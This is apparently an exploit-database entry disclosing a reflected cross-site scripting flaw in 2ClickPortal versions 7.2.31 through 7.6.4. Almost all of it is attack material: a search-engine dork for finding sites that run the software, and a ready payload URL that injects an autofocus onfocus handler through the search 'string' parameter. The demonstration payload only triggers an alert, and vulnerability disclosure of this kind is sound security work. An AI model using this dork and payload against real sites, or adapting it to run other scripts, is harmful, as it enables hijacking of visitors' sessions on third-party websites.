
Proof-of-concept exploit for reflected XSS vulnerability in 2ClickPortal versions 7.2.31 through 7.6.4, with a search parameter injection payload.
Reflected XSS in 2ClickPortal
Version: from 7.2.31 through 7.6.4.
intext:"Powered by 2ClickPortal"
https://[domain]/szukaj/?search_lang=pl&search=all&string=" onfocus=alert(1) autofocus="